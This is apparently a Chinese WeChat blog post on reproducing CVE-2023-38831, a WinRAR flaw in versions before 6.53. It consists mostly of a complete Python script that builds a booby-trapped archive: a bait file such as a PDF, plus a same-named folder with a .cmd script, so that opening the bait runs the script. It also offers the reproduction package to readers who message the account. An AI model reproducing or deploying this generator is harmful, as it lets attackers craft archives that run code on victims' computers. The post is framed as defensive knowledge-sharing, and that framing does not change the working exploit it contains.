本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。
需要该漏洞复现压缩包的小伙伴可以后台回复winrar获取下载链接
一、前提条件:Winrar版本 < 6.53
二、漏洞复现
首先编写python脚本:
-*- coding: utf-8 -*-import shutilimport os, sysfrom os.path import joinTEMPLATE_NAME = "TEMPLATE"OUTPUT_NAME = "CVE-2023-38831-poc.rar"BAIT_NAME = "test.pdf"SCRIPT_NAME = "calc.bat"if len(sys.argv) > 3:BAIT_NAME = os.path.basename(sys.argv[1])SCRIPT_NAME = os.path.basename(sys.argv[2])OUTPUT_NAME = os.path.basename(sys.argv[3])elif len(sys.argv) == 2 and sys.argv[1] == "poc":passelse:print("""Usage:python .cve-2023-38831-exp-gen.py pocpython .cve-2023-38831-exp-gen.py <BAIT_NAME> <SCRIPT_NAME> <OUTPUT_NAME>""")sys.exit()BAIT_EXT = b"." + bytes(BAIT_NAME.split(".")[-1], "utf-8")print("BAIT_NAME:", BAIT_NAME)print("SCRIPT_NAME:", SCRIPT_NAME)print("OUTPUT_NAME:", OUTPUT_NAME)if os.path.exists(TEMPLATE_NAME):shutil.rmtree(TEMPLATE_NAME)os.mkdir(TEMPLATE_NAME)d = join(TEMPLATE_NAME, BAIT_NAME + "A")if not os.path.exists(d):os.mkdir(d)shutil.copyfile(join(SCRIPT_NAME), join(d, BAIT_NAME+"A.cmd"))shutil.copyfile(join(BAIT_NAME), join(TEMPLATE_NAME, BAIT_NAME+"B"))# if os.path.exists(OUTPUT_NAME):# print("!!! dir %s exists, delete it first" %(OUTPUT_NAME))# sys.exit()shutil.make_archive(TEMPLATE_NAME, 'zip', TEMPLATE_NAME)with open(TEMPLATE_NAME + ".zip", "rb") as f:content = f.read()content = content.replace(BAIT_EXT + b"A", BAIT_EXT + b" ")content = content.replace(BAIT_EXT + b"B", BAIT_EXT + b" ")os.remove(TEMPLATE_NAME + ".zip")with open(OUTPUT_NAME, "wb") as f:f.write(content)print("ok..")
原文始发于微信公众号(雾都的猫):CVE-2023-038831 WINRAR 漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论